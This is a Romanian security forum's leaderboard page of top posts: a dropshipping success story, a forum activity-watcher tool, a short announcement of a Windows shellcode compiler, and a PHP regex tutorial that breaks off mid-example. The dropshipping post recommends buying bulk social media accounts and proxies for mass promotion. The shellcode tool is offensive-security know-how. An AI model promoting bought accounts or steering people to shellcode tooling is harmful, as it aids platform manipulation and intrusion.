Leaderboard


Popular Content

Showing content with the highest reputation since 05/29/17 in all areas

  1. 20 points
    Salut, Acum un an, scriam niste cateva randuri pe acest forum cu privire la dropshipping si afilieri, cred ca unele topicuri au disparut insa...pentru ca primesc intrebari pe privat, skype, mail referitoare la domeniul dropshippingului si vin pe forum sa caut cele ce le-am scris deja sa dau lumii sa citeasca si nu mai gasesc...probabil odata cu upgradeul forumului...s-a mai pierdut date..n-am idee... O sa mai scriu odata bazele acestui domeniu asa cum le stiu eu, ce fac, cum fac, de unde iau si ce mai stiu... ------------------ Am pornit la drum acum un an, cu 16 dolari care ii aveam pe paypal, auzisem de dropshipping, citisem cateva tutoriale si mi se parea super ideea, se potrivea cu vorba unui om care avea o influenta destul de mare asupra mea : Nepoate, eu nustiu cum functioneaza treburile astea cu internetul, am 69 de ani, dar tot vad la televizor. comanda online, cumpara pe internet...asta inseamna ca cineva are ceva de vandut, si face bani....face reclama si la televizor, a dracului...fix in timpul filmelor mai bune...sa intri si sa cumperi. Am vazut, treburi dealea de masaj...saltele...tratamente Daca tu nu ai ce sa vinzi, vinde si tu pentru ei, daca ei vind o saltea cu 2 lei tu vindea altuia cu 2lei 50, asa se fac bani... S-a stins intre timp... In fine, plecand de la ideea aceasta, am facut o corelatie cu dropshippingul, care este cam acelasi lucru...lumea vinde produsele altora. In Romania, daca iti deschizi o firma pe aceasta ramura se numeste "Intermediere de servicii", asta am invatat mai tarziu. Am luat hosting, domeniu, am pus wordpress pe el, am cautat o tema tip "ecommerce" pe care am incarcat-o, cateva pluginuri + pluginul principal Woocommerce si asta a fost tot - ramasesem si fara bani. Am cautat o nisa cu produse pe aliexpress / alibaba / dinodirect etc si am inceput sa incarc produse, MANUAL. Luam numele produsului, poze, descriere, pret, tot si incarcam in site-ul meu. A fost o munca care mi se parea zadarnica uneori...pentru ca trebuia sa scot de multe ori watermarkuri la poze...si pierdeam ore in photoshop...trebuiau incarcate preturi in woocommerce, facute clase, (cei care a-ti mai utilizat stiti despre ce vorbesc ) apoi incarcate pozele, descriere, aranjare in pagina, calculare shipping etc. Am adaugat multe produse asa...am muncit saptamani intregi. Nu mai stiu cate produse am adaugat ca nu aveam un numar in cap, trebuia sa mi se para mie plin, populat, diversificat. Am terminat site-ul entuziasmat si mi-am dat seama ca nu am cu-i sa vand. Pe nisa care o alesesem nu aveam nici o sansa in urmatorul an sa ajung macar in primele 10 pagini de google... Avem cateva pagini de facebook si am tot da shareuri acolo....apoi am observat ca lumea tot intreba de produse, pret, shipping etc, atunci am stiu unde o sa fac promovare => Social Media. Am inceput sa fac vanzari destul de repede spre surprinderea mea (cei care mi-au citit celelalte topicuri pe tema, au vazut si printurile cu veniturile ), Faceam si affiliere pe vremea aceea. Nu mai am poze...am gasit un singur print de la affilieri: Primele luni, 80% din venituri le-am reinvestit in oameni, adica am cumparat conturi de social media si altele (proxyuri, massplanner etc). In acest moment detin 20 de conturi de instagram, 20 de twitter, 31 de pagini de fb si vreo 15 grupuri, vreo 8 pagini de pinterest. Saptamana trecuta facusem un calcul si ma adresam la aproximativ 6 milioane de oameni, toti targetati pe nise, majoritatea din USA / UK. ------------------------- In momentul de fata, colaborez direct cu cinezii...pe care i-am abordat pe alibaba si aliexpress...dar doar cu cei care au si depozite in EU si / sau in USA - credeti-ma sunt destui. Platesc ceva in plus ca sa imi lipeasca niste stickere cu logoul meu si sa nu puna chinezariile lor pe colete. Detin 41 de site-uri, nise diferite...la un moment dat am avut mai multe dar am renuntat... Ma adresez la aprox 6 mil oameni. Procentul meu este de 20%, reprezentand pretul cu care il cumpar Am 2 VA care ma ajuta Am firma mea Inca nu mi-am dat demisia de la job - e destul de permisiv..si stau foare mult in fata pc-ului (sysadmin) asa ca am timp sa lucrez si la ale mele... Tot ce am facut a fost disponibil pe internet pentru toata lumea. Nu am avut acces la vreo metoda secreta sau la buget mai mare, nu, am plecat cu 16 dolari - si no sa uit niciodata intrucat rad inca cu familia mea pe aceasta tema si am ajuns sa fac destuii bani incat sa nu am nevoie de job - dar la care inca merg. Cu timpul a aparut si primul plugin de dropshipping, care este destul de scump dar merita, Yaross a muncit extrem de mult la el, practic automatizeaza TOT, se vinde cu tot cu tema wordpress. Nustiu cum o sa se numeasca, nu e liber pentru toata lumea, insa eu am avut onoarea sa fiu unul din beta testari si am ramas uimit de ce poate acest plugin, practic iti pune siteul pe picioare cu tot cu tema in 5 minute + produse + clase+ clacule, shipping tot ...ai tot, complet. Un exemplu de site facut cu acest plugin si tema : https://kittenrules.com/ Sa nu mi cereti inca acest plugin ca nu e gata , inca mai lucreaza la el. Va propun sa va strangeti profile de social media si sa le cresteti, sa va creati o audienta, caci ei sunt clientii vostri ! Unii m-au intrebat cati bani fac in momentul acesta, ei bine nu pot raspunde la aceasta intrebare pentru ca fluctueaza, azi noapte, cat am dormit, am facut aproape 400 de dolari - profit, ieri noapte a fost mai putin. Acum sa nu va ganditi ca din acestia 400 nu cheltuii....VPS-uri...hosting, domenii...trackers...numere de skype...proxyuri..VA, taxe, contabili ..toate astea costa...insa raman si eu cu 170-200. Daca va apucati nu luati in ras clientii...stati de vorba cu ei, cumparati-va un nr de telefon de la skype, sunatii, intrebatii daca e in ordine etc, ei pun mare pret pe asa ceva, imi scriu review-uri, dat share la articole, siteuri, si revin sa faca cumparaturi. Am vrut sa scriu multe aici, nustiu cate am apucat ca scriu de vreo 4 ore timp in care tot fug sa fac acte altceva...revin...sper sa nu fi ametit tot pe aici... Ideea e ca in acest moment conduc o afacere din spatele pc-ului, care merge destul de binisor, mi-am luat deja un apartament din banii pe care i-am facut pe net (m-au mai ajutat si ai mei) si ma gandesc acum sa ma extind, adica sa imi inchiriez un spatiu cu 3-4 oameni care sa se ocupe de toata treaba. Am un de pozit in UK unde tineam produse....era cineva care avea grija de ele si pe care il plateam lunar ( transfer bancar) - m-am dus lunile trecute acolo...am reusit sa ajung...si mai avea putin si ma batea...nu ma cunostea...credea ca's la furat. Nu fac nimic special, si voi puteti face la fel. Spre exemplu m-am afiliat cu un tip Roman, care are un site despre accesorii de catei...ei bine, eu am un magazin online cu mancare de catei...pet food...asa ca el vinde..si da vouchere oamenilor de 10% pe site-ul meu..si invers, ne promovam unul pe altul. Se pot face multe....doar sa va apucati de treaba. Numai Bine sper sa raspunda intrebarilor unora. PS: Scuze de greselile gramaticale, promit sa editez.
  2. 17 points
    Am revenit cu un nou index pentru RST. E scris in AngularJS, complet client side. Are notificari, am folosit acelasi sunet de pe forum pentru a nu va obisnui cu altul pentru acelasi lucru. Are si partea de notificari pentru quote-uri, rep si toate cele, pm-uri, pentru mods are si reported posts. Totul functioneaza prin autorefresh la 5 secunde. Daca vreti sa schimbati tema sau sa opriiti notificarile, aveti butoane in partea dreapta, sus. Sursa: https://github.com/RomanianSecurityTeam/IPBActivityWatcher Il puteti folosi pe propriul forum daca aveti ultima versiune de IPB. Print-uri: Dark: https://i.imgur.com/jxGrloe.png Light: https://i.imgur.com/6eQDyAJ.png
  3. 16 points
    Shellcode Compiler Shellcode Compiler is a program that compiles C/C++ style code into a small, position-independent and NULL-free shellcode for Windows. It is possible to call any Windows API function in a user-friendly way. Shellcode Compiler takes as input a source file and it uses it's own compiler to interpret the code and generate an assembly file which is assembled with NASM (http://www.nasm.us/). Shellcode compiler was released at DefCamp security conference in Romania, November 2016. Link: https://github.com/NytroRST/ShellcodeCompiler
  4. 16 points
    Data: 27.12.2013 Autor: Gecko Acest tutorial este destinat incepatorilor, dar exemplele si link-urile sunt folositoare oricui. Regex (sau regexp; prescurtare pentru regular expressions) este o secventa de caractere care alcatuiesc un tipar (pattern) de cautare. Daca sunteti programatori, il regasiti frecvent in limbajele de programare si/sau scripting si in editoarele de text. Poate fi folosit in cautari simple, dar, in principal, este folosit pentru a extrage date dintr-un sir lung de caractere (de exemplu, sursa unei pagini HTML), asta veti invata sa faceti si voi cu ajutorul acestui tutorial. Cu siguranta ati vazut un pattern regex pe undeva daca sunteti programatori, chiar si amatori. E acel lucru de care se fereste toata lumea la inceput pentru ca nimeni nu-l intelege, dar dupa ce intelegeti ce este si cum sa compuneti unul, o sa observati si singuri cat de puternic este. De asemenea, de mentionat este ca toate exemplele principale din acest tutorial sunt scrise in functie de limbajul PHP. A. Aplicabilitate As dori sa precizez ca regex difera in aplicabilitate in functie de limbaj sau editor, dar nu cu mult, si cu siguranta dupa ce veti intelege in ce constau aceste diferente, le veti putea gasi usor in documentatia aferenta limbajului sau cu ajutorul prietenului Google. De asemenea, voi incerca sa precizez cand apar astfel de diferente. Un alt lucru important de retinut este ca puteti folosi un pattern in mai multe scopuri. (1) Puteti pur si simplu sa verificati daca exista intr-un sir, (2) puteti sa extrageti diferite parti dintr-un sir sau (3) puteti inlocui anumite parti dintr-un sir. Iata si cate un exemplu, in PHP: 1. Verifica daca exista cuvantul "dolor" in sirul "Lorem ipsum dolor sit amet" preg_match( '/dolor/', 'Lorem ipsum dolor sit amet' ); Nota: Acel caracter '/' de la inceput si de la sfarsit nu este pus acolo ca sa va incurce pe voi mai tare. Regex are nevoie de un delimitator ca sa stie unde incepe pattern-ul si unde se termina. Daca aveti nevoie sa folositi caracterul '/' in pattern-ul vostru de cautare, puteti sa-l folositi cu escape: '\/'. Voi explica despre caracterele care necesita escape mai tarziu mai in detaliu. 2. Verifica daca exista cuvantul "dolor" in sirul "Lorem ipsum dolor sit amet", iar daca aceasta conditie este indeplinita, pattern-ul este returnat in variabila $rezultat preg_match( '/dolor/', 'Lorem ipsum dolor sit amet', $rezultat ); 3. Inlocuieste cuvantul "dolor" cu "RST" preg_replace( '/dolor/', 'RST', 'Lorem ipsum dolor sit amet' ); B. Elemente 1. Caractere alfa-numerice Literele si numerele sunt cele mai des folosite caractere pentru a crea un pattern. Considerand urmatorul sir de caractere: 'Acesta este un tutorial despre regex.' Dupa cum am observat anterior, cu regex putem verifica daca exista un anumit sir in sirul dat: preg_match( '/dolor/', 'Acesta este un tutorial despre regex.' ); Aceasta bucata de cod va returna false pentru ca nu exista nimic in sirul de caractere dat asemanator pattern-ului de cautare. La fel putem cauta dupa numere. Daca avem urmatorul sir: '007 este un film artistic.' Si vrem sa cautam "007", procedam in felul urmator: preg_match( '/007/', '007 este un film artistic.' ); Iar de data aceasta va returna true pentru ca "007" exista in sirul dat. --- Nu am inceput cu aceste exemple banale, doar ca sa va fac sa cititi chestii in plus, ci pentru ca asa puteti vizualiza in minte cel mai bine cum functioneaza regex. Ce urmeaza in continuare sunt doar caractere care substituie alte caractere pentru a diminua lungimea pattern-ului, dar principiul de functionare este acelasi ca la cele alfa-numerice. --- 2. Caractere speciale 2.1. Caractere non-printabile In aceasta categorie intra new line (linie noua sau sfarsit de rand), caracterul tab si altele. "\n" reprezinta un new line "\t" reprezinta un tab orizontal "\v" reprezinta un tab vertical "\r" reprezinta un carriage return etc. Aceste caractere nu depinde de regex, ele sunt pur si simplu caractere speciale existete in limbajele de programare, asa ca pentru o lista completa va trebui sa cautati pe Google. Un exemplu pentru a identifica un new line intr-un sir este urmatorul: Considerand urmatorul sir: $sir = 'Now that there is the Tec-9, a crappy spray gun from South Miami. This gun is advertised as the most popular gun in American crime. Do you believe that shit?'; Pentru a cauta, vom folosi urmatoarea instructiune: preg_match( '/\n/', $sir ); Aceasta va returna true din motive sper ca evidente pana acum. 2.2. Caractere care necesita escape Escape inseamna acel '\' inaintea unui caracter. Exemplu: ' \' '. Majoritatea ar trebui sa fiti familiarizati cu situatiile in care trebuie sa folositi escape, doar ca regex este diferit asa ca exemplele urmatoare: '\'', "\"" sau caracterele non-printabile nu sunt singere situatii in care este necesar caracterul de escape. Regex contine diferite caractere care au efectul scontat doar daca sunt scrise cu '\' in fata. "\d" (digit) selecteaza un caracter numeric Exemplu: preg_match( '/\d/', 'Ana are 7 mere acre.' ); Aceasta secventa va returna true pentru ca exista acel 7 in string pe care acest caracter regex il cauta. "\w" (word) selecteaza un caracter ce face parte dintr-un cuvant (o litera, un numar sau un underscore '_', daca acestea sunt scrise legate de o litera, adica daca nu exista un spatiu intre ele) - acesta poate include mai multe caractere pe care le poate considera cuvinte, asta depinde de implementarea de regex Exemplu: preg_match( '/\w/', 'Ana are 7 mere acre.' ); Aceasta secventa va returna true din cauza primului caracter "A" din sir. "\s" (white space) selecteaza un spatiu - si el depinde de diferitele implementari de regex, dar, in general, lumea il foloseste pentru a selecta un spatiu normal " " Exemplu: preg_match( '/\s/', 'Ana are 7 mere acre.' ); Aceasta secventa va returna true din cauza primului spatiu de dupa cuvantul "Ana". Pentru toate cele trei exemple de mai sus exista si variantele care selecteaza pe dos. "\D" selecteaza orice inafara de cifre "\W" selecteaza orice inafara de caractere dintr-un cuvant "\S" selecteaza orice inafara de caractere de tip spatiu 2.3. Caracterul "." Acest caracter functioneaza ca si cele despre care am vorbit anterior, dar charset-ul este mai complex. Practic, selecteaza absolut orice caracter, inafara de cel de new line. Dar, din nou, depinde de implementarile regex. Exemplu: preg_match( '/./', 'Ana are 7 mere acre.' ); Din moment ce exista caractere diferite de cel de new line, aceasta secventa va returna true. 3. Secvente de caractere Tot ce am vazut pana acum selecteaza cate un singur caracter, acum vom trece la lucruri mai complicate si vom invata cum sa compunem intr-adevar un pattern regex. 3.1. Elemente de repetitie La toate caracterele amintite anterior se pot adauga unul din caracterele urmatoare: "+" sau "*". 3.1.1. Caractere de repetitie "+" inseamna ca orice caracter ce il precede exista in sir cel putin odata. "*" inseamna acelasi lucru, cu mentiunea ca acel caractere care il precede poate lipsi din sir si expresia va returna true. Sa vedem cateva exemple pentru a intelege mai bine. preg_match( '/\s+/', 'Security' ); Returneaza false pentru ca "\s+" presupune sa existe in sir cel putin un spatiu. In schimb... preg_match( '/\s*/', 'Security' ); Returneaza true pentru ca "*" nu presupune neaparat ca spatiul acela sa existe. Din nou, aceste doua caractere se pot folosi pentru orice caracter, sau grupuri de caractere, cum vom invata mai tarziu. 3.1.2. Caracterele "{" si "}" Pe langa "+" si "*", mai exista un mod prin care putem delimita marimea unui grup de caractere. Aceasta metoda este mult mai precisa. "\w{3}" aceasta sintaxa va selecta un cuvant de exact 3 caractere "\w{3,6}" aceasta sintaxa va selecta un cuvant de minim 3 si maxim 6 caractere preg_match( '/\w{8}/', 'Security', $rezultat ); $rezultat[0] contine "Security", pentru ca pattern-ul cauta un cuvant de 8 caractere. preg_match( '/\w{10}/', 'Security', $rezultat ); $rezultat[0] este gol, pentru ca nu exista niciun cuvant de 10 caractere in sir. preg_match( '/\w{4,20}/', 'Security', $rezultat ); $rezultat[0] contine "Security" pentru ca selecteaza un cuvant cu numarul de caractere intre 4 si 20. Retineti, un cuvant, in regex, este un sir de litere, numere si caractere underscore. Si nu va selecta primele 4 caractere (numarul minim) din sir, ci tot ce inseamna cuvant de la inceputul cuvantului "Security" pana la un caracter ce nu apartine charset-ului "\w", sau al 20-lea dupa primul selectat. E incurcata fraza asta, dar o veti intelege daca o veti citi de mai multe ori. E logica. 3.2. Grupuri de caractere Cu regex putem sa selectam grupuri de caractere definite prin mai multe charset-uri puse laolalta. De exemplu, daca vrem sa selectam un cuvant succedat de un simbol "#", o putem face astfel: preg_match( '/\w+\#+/', 'sir' ); Nota: Deoarece exista diferente in implementarile regex, ca sa fiti siguri ca toate simbolurile sunt interpretate cum ne dorim, putem adauga un caractere de escape in fata. Simbolurile nu au semnificatii speciale daca le scriem cu escape, asa ca '\#' este acelasi lucru cu '#'. Am precizat acest lucru pentru ca, in PHP (de exemplu), nu doar caracterul '/' se poate folosi pentru a delimita pattern-ul, ci se poate folosi orice alt simbol, daca este acelasi si la inceput si la sfarsit. preg_match( '#\w+\#+#', 'sir' ); Este acelasi lucru cu exemplul anterior, dar s-a folosit caracterul '#' pentru delimitarea pattern-ului, iar daca nu am fi tracut un escape in fata simbolului nostru '#', am fi stricat pattern-ul. Caracterul '/' se foloseste cel mai frecvent pentru ca in majoritatea limbajelor de programare a fost implementat cu acest scop, dar PHP ne permite sa folosim orice alt simbol. Este bine de stiut acest lucru pentru ca daca aveti un pattern cu multe simboluri '/', nu are rost sa-l folositi si ca delimitator si cu escape peste tot. Din nou, acest lucru se aplica in cazul PHP, nu stiu in care alt limbaj mai este posibil, dar va las pe voi sa aflati, in functie de ce folositi. Ca sa dam si un exemplu, o sa facem o simpla instructiune de verificare sa vedem daca un string este un URL: preg_match( '@https*://\w+\.\w{2,4}/*@', 'https://rstforum.com/' ); In primul rand, am spus ca e bine sa facem escape la toate simbolurile pentru a fi siguri ca le interpreteaza cum trebuie, dar am omis asta de data aceasta pentru a putea sa intelegeti mai usor pattern-ul. In al doilea rand, nu folositi pattern-ul acesta pentru a verifica URL-uri in situatiile reale pentru ca nu este gata, inca nu am explicat indeajuns de multe elemente regex pentru a ajunge la o instructiune fara greseala. Pattern-ul de mai sus nu verifica si dupa numere in numele domeniului, nu verifica daca exista www. la inceput s.a.m.d. Observam in prima faza observam: '@https*@' Asta inseamna ca sirul trebuie sa inceapa cu "http" si poate avea sau nu caracterul "s" in continuare. Apoi avem: '@://@' Care cauta exact ce se vede. In continuare: '@\w+@' Care selecteaza un cuvant de un caracter, sau mai mult, dintr-un cuvant. '@\.@' Despre acesta nu am aflat anterior, dar consider ca este pur si simplu self-explanatory. Reprezinta un caracter ".". I-am pus un escape in fata doar ca sa nu fie interpretat ca fiind caracterul regex ".", care selecteaza aproape orice caractere. '@\w{2,4}@' Cum nu stiu sa existe nume de domenii mai mici de 2 caractere in lungime si mai mari de 4, am precizat ca dupa punct trebuie sa existe un cuvant de minim 2 si maxim 4 caractere. Acest ultim pattern exemplifica cel mai bine un grup de caractere. Aceste grupuri sunt folosite pentru a crea un pattern de detectie mai puternic decat daca am fi pus un simplu '.*' pentru a selecta tot ce se afla in string. Aceste tipuri de pattern-uri sunt ceea ce fac regex sa conteze in programare. Am fi putut da explode() de nenumarate ori pentru a verifica acelasi lucru in mult mai multe linii, dar aceasta instructiune preg_match() se poate pune intr-un if si asta e tot. Din nou, nufolositi ultimul exemplu in aplicatii reale pentru ca nu e complet. 3.3. Dictionare de caractere Am invatat in pasul anterior ca puteti crea o anumita ordine cand creati patternul, dar cum facem daca vrem sa selectam un anumit grup din sir care sunt reprezentate de mai multe elemente regex ? Raspunsul e: Simplu, folosim caracterele "[" si "]". Tot ce se afla in interiorul acestor doua caractere este considerat un dictionar, iar in sir se va cauta un caracter ce face parte din acest dictionar. 3.3.1. Simboluri speciale in interiorul "[]" "^" pus la inceput, inseamna ca tot ce se afla in continuare, pana la "]", este ignorat in cautarea in sir. Practic inseamna "selecteaza-mi tot INAFARA de ce este intre aceste doua paranteze patrate". preg_match( '/[^\d]/', 'RST' ); Acesta va returna true pentru ca este in cautarea oricarui caracter diferit de "\d" (cifre). De aici ne putem da seama ca "[^\d]" este de fapt echivalent cu "\D", cu mentiunea ca nu e asa. "\D" este de fapt un alias pentru "[^\d]", nu invers. La fel si "\W" pentru "[^\w]" sau "\S" pentru "[^\s]". "-" (minus) alcatuieste intervaluri intre caractere. "[0-7]" selecteaza toate cifrele de la "0" la "7", "[a-q]" selecteaza toate caracterele de la "a" la "q", "[A-Q]" selecteaza toate caracterele de la "A" la "Q" s.a.m.d. Puteti forma ce intervale vreti: "[a-b]", "[a-c]", "[a-d]" ... Ajungem din nou la alias-uri si aflam ca "\d" este acelasi lucru cu "[0-9]" s.a.m.d. 3.3.2. Secvente de caractere in interiorul "[]" Dupa cum am spus, "[" si "]" creaza un dictionar, deci putem pune mai multe selectoare laolalta. Nota: "." si "+", intre "[]" sunt simple caractere, nu mai au niciun efect special. Ca sa imbunatatim un pic checker-ul de mai devreme de adrese URL, il vom modifica astfel: preg_match( '@https*://[a-z0-9\-]+\.[a-z]{2,4}/*@', 'https://rstforum.com/' ); Totul este identic pana la: '/[a-z0-9\-]+/' Acum, inaintea punctului din domeniu, verificam daca exista litere, numere si minusuri. A se observa minusul precedat de escape; dupa cum am spus, minusul creaza intervaluri si nu vrem sa fie interpretat gresit, asa ca ii vom trece escape in fata pentru a fi siguri de rezultat. Nota: Fiind un dictionar, elementele din el nu vor fi cautate in aceeasi ordine in care au fost adaugate, astfel ca "[a-z0-9\-]" este cu totul diferit de "a-z0-9\-". Aceasta este partea interesanta la dictionare, acest fapt trebuie retinut pentru a va da seama cand le folositi. Din acest motiv, daca as fi adaugat si punctul in dictionar, acesta nu ar mai fi fost obligat sa se afle la sfarsitul dictionarului, si astfel ar strica scopul checker-ului. In continuare observam inca o diferenta: '/[a-z]{2,4}/' Am modificat aceasta bucata pentru ca "\w" selecta si numere sau caractere underscore, si nu exista asa ceva in TLD-uri, asa ca le-am ignorat si astfel checker-ul nostru este mai puternic. --- Putem obtine un numar foarte mare de combinatii diferite, dar si cele extrem de simple sunt puternice. Un exemplu: '/gr[ae]y/' Nu va selecta "graey" sau "greay", dupa cum observat, este un dictionat nesuccedat de un element de repetitie ("*", "+" sau "{}"), deci in prima faza ar trebui sa va dati seama ca va selecta un singur caracter. Deci rezultatele pe care se aplica sunt "gray" si "grey". 3.3.2.1. Exceptii de caractere in interiorul "[]" Exista posibilitatea de a selecta un intreg grup de charset-uri, cu cateva exceptii setate de noi. Cu ajutorul pattern-ului urmator: '/[a-z-[aeiuo]]/' Putem selecta doar consoanele din intervalul "a-z". Tot in acest exemplu observam ca "-" mai are o semnificatie in interiorul "[]", aceea de diferenta, exact ca in matematica. Practic calculeaza "alfabet - vocale = consoane". Charsetul unicode Se presupune despre acest charset ca ar contine toate caracterele din toate limbile (vii sau moarte). Puteti folosi acest charset pentru a create directionare extrem de spicifice pentru ce vreti sa cautati intr-un sir. Pentru a selecta ceva dintr-un charset se foloseste "\p" sau "\P" care este echivalent cu "^\p", urmate the numele a ceea ce vreti sa selectati din charset intre "{}". Un dictionar cu toate caracterele latine arata cam asa: '/[\p{Latin}]/' Daca vreti sa selectati acelasi lucru dar fara cifre: '/[\p{Latin}-[\p{Nd}]]/' "Nd" este prescurtare pentru "not digit" Exista extrem de multe instructiuni pentru aceasta categorie, extrem de multe constante pentru "{}" si extrem de mutle combinatii pe care nu le pot include aici pentru ca as distrage atentia de la ideea principala. Puteti vedea mai multe proprietati si caractere aici: Unicode Properties and Caracters Pentru a folosi "\p" in PHP, trebuie sa specificati ca intentionati sa folosi charsetul unicode in felul urmator: preg_match( '/[\p{Latin}-[\p{Nd}]]/[b]u[/b]', 'Sir' ); PHP si alte limbaje suporta acest tip de instructiuni suplimentare dupa pattern-ul regex. Majoritatea includ cateva by default. 3.3.2.2. Intersectii de caractere in interiorul "[]" Mi se pare important sa stiti ca exista, dar sunt folosibile doar in Perl si Ruby (versiunea 1.9+). Pentru a scrie exemplul cu alfabetul fara vocale de mai devreme in modul acesta: '/[a-z&&[^aeiuo]]/' 3.3.3. Simboluri speciale in exteriorul "[]" Tot ce se aplica la orice alt tip ce charset-uri ("\d", "\w", "\s" etc) se aplica si aici. Exemple: '/[a-z]+/' '/[a-z]*/' '/[a-z]{1,3}/' 4. Ancore Ancorele sunt elemente care specifica unde ar trebui sa inceapa si unde sa se termine un sir. "^" determina inceputul sirului "$" determina sfarsitul sirului "\b" determina limita pentru un cuvant De exemplu: preg_match( '/Security/', 'Romanian Security Team' ); Returneaza true pentru ca "Security" exista undeva in sir. Dar daca vrem sa verificam daca sir-ul incepe si se termina in "Security" (adica este egal cu el), vom proceda astfel: preg_match( '/^Security$/', 'Romanian Security Team' ); Acesta va returna false pentru ca mai exista caractere si la stang si la dreapta de "Security". Se pot folosi si cate unul: preg_match( '/^Security/', 'Romanian Security Team' ); sau preg_match( '/Security$/', 'Romanian Security Team' ); Care returneaza false amandoua. Daca ati fost atenti, ati observat ca "^" are doua intelesuri diferite in regex. Da, e adevarat, si asta pentru ca "[]" este atat de complex incat majoritatea sensurilor elementelor regex se schimba inauntru pentru a forma altele relative pentru "[]". "\b" e acelasi lucru ca si "^" si "$" doar ca nu determina inceputul sirului si inceputul sau sfarsitul unui cuvant. Ca si la alte elemente, "\B" este opusul lui "\b". Pentru a demonstra cel mai bine importanta lui "\b", vom face o functie care cenzureaza un cuvant doar atunci cand e scris separat, nu si atunci cand face parte dintr-un altul. preg_replace( '/\bpula\b/', '****', 'Cuvantul "pula" va fi cenzurat, dar nu si in "manipulare".' ) Rezultatul va fi 'Cuvantul "****" va fi cenzurat, dar nu si in "manipulare".'. 5. Caracterele "|" si "?" si grupari "()" parenteze rotunde se pot folosi in gruparea unor charset-uri "|" are rol de "OR" (in traducere: "SAU") "?" face ca ceea ce il precede sa fie optional Pentru a cauta intr-un string cuvintele "RST" sau "Security", vom proceda astfel: preg_match( '/RST|Security/', 'RST rullz.' ); sau preg_match( '/RST|Security/', 'Security rullz.' ); Vor retuna ambele true pentru ca in primul exista "RST" iar in al doilea "Security". Daca avem mai multe cuvinte de cautat, putem folosi "()" pentru a le grupa: preg_match( '/(RST|Romanian Security Team)/', 'Security rullz.' ); Acest exemplu va returna false pentru ca este cautat "RST" sau "Roamnian Security Team", iar in sir gasim doar o parte din a doua optiune, ceea ce nu e de ajuns. Caracterul "?" este folositor cand cautam ceva care ar putea avea o componenta in plus, dar nu suntem siguri: preg_match( '/RST(: Romanian Security Team)?/', 'RST' ); preg_match( '/RST(: Romanian Security Team)?/', 'RST: Romanian Security Team' ); Ambele vor returna true pentru ca ": Romanian Security Team" este optional. --- "()" mai eu o semnificatie cand vreti sa returnati o anumita parte dintr-un pattern in variabila de rezultat. Din exemplul urmator: preg_match( '/\d{1,2} \w+ \d{4}/', '27 decembrie 2013', $rezultat ); Variabila $rezultat va contine un array cu urmatoarele in el: ( [0] => '27 decembrie 2013' ) Dar, daca folosim "()" pentru a grupa elementele din pattern: preg_match( '/(\d{1,2}) (\w+) (\d{4})/', '27 decembrie 2013', $rezultat ); $rezultat va contine: ( [0] => '27 decembrie 2013' [1] => '27' [2] => 'decembrie' [3] => '2013' ) Deci prima optiune va fi mereu rezultatul complet al pattern-ului, iar urmatoarele rezultatele individuale in functie de cate "()" am folosit si la ce. Putem chiar si inlocui anumite parti dintr-un sir pe baza unui pattern: preg_replace( '/(\d{1,2} \w+) \d{4}/', '$1 2014', '27 decembrie 2013' ); Cand folosim replace, tot ce trecem in paranteze primeste o anumita variabila incepand de la "$1" pana la cate paranteze avem. In exemplul de mai sus am grupat ziua si luna si le-am folosit in rezultat prin variabila "$1" alaturi de un nou an. Acea linie de cod va returna "27 decembrie 2014". --- Folosind ce am invatat pana acum, putem imbunatati sistemul nostru de a verifica daca un sir este un URL valid: preg_match( '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i', 'https://rstforum.com/', $rezultat ); Acel "i" de dupa pattern este o optiune speciala prin care precizam ca pattern-ul este 'case insensitive', deci va trata "A-Z" la fel ca "a-z". Asta pentru ca un URL este valid chiar daca este scris cu litere mari sau mici si nu are sens sa mai precizam si noi peste tot si "A-Z" in aditie la "a-z". Incepem prin a folosi alt caracter pentru a delimita pattern-ul pentru ca "/" il folosim in pattern si nu vrem sa le incurcam. '@@i' In continuare vom grupa tot ce scriem pana la ultimul "/" de dupa TLD pentru ca vrem sa-l retinem intr-o variabila separat, posibil il vom folosi mai tarziu undeva in vreun proeict. Dupa grupare adaugam ".*" pentru a selecta tot ce a mai ramas dupa TLD si "/". '@().*@i' Inainte de grupare adaugam caracterul "^" pentru ca un URL nu poate contine nimic inainte de http. '@^().*@i' In grupare incepem sa scriem inceputul fiecarui URL: '@^(http).*@i' Continuam cu "s?" pentru ca nu toate URL-urile sunt secure, deci "s" nu va exista mereu in componenta URL-ului: '@^(https?).*@i' Adaugam "://" care e constant: '@^(https?://).*@i' Acum ne gandim la subdomenii (si "www." se catalogheaza ca fiind subdomeniu in cazul asta), pot avea in componenta aceleasi lucruri ca domeniul. De data asta nu vom pune punctul dupa subdomeniu pentru ca asta ar insemna sa limitam URL-ul la un singur subdomeniu, ceea ce nu ar fi bine, de asta adaugam "." intre "[]" de la subdomeniu. Practic selecteaza tot ce vine dupa "://" si are "[a-z0-9\-.]+" in componenta. Dupa asta adaugam un "*" pentru ca subdomeniul poate lipsi. '@^(https?://[a-z0-9\-.]*).*@i' In continuare avem ce aveam si inainte pentru a manageria domeniul si TLD-ul. '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}).*@i' Iar in cele din urma, adaugam "/?" pentru ca si acest simbol poate lipsi. '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i' Cateva teste si rezolutate ale acestui pattern pe URL-uri reale: #1. Exemplu: preg_match( '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i', 'https://rstforum.com/', $rezultat ); #1. Rezultat: Array ( [0] => https://rstforum.com/ [1] => https://rstforum.com/ ) Primul este rezultatul pattern-ului integ, iar al doilea rezultatul dintre "()". #2. Exemplu: preg_match( '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i', 'https://rstforum.com/forum/', $rezultat ); #2. Rezultat: Array ( [0] => https://rstforum.com/forum/ [1] => https://rstforum.com/ ) #3. Exemplu: preg_match( '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i', 'http://www.g3x0.com', $rezultat ); #3. Rezultat: Array ( [0] => http://www.g3x0.com [1] => http://www.g3x0.com ) #4. Exemplu: preg_match( '@^(https?://[a-z0-9\-.]*[a-z0-9\-]+\.[a-z]{2,4}/?).*@i', 'http://www.g3x0.com/hireme/', $rezultat ); #4. Rezultat: Array ( [0] => http://www.g3x0.com/hireme/ [1] => http://www.g3x0.com/ ) #5. Exemplu: preg_match( 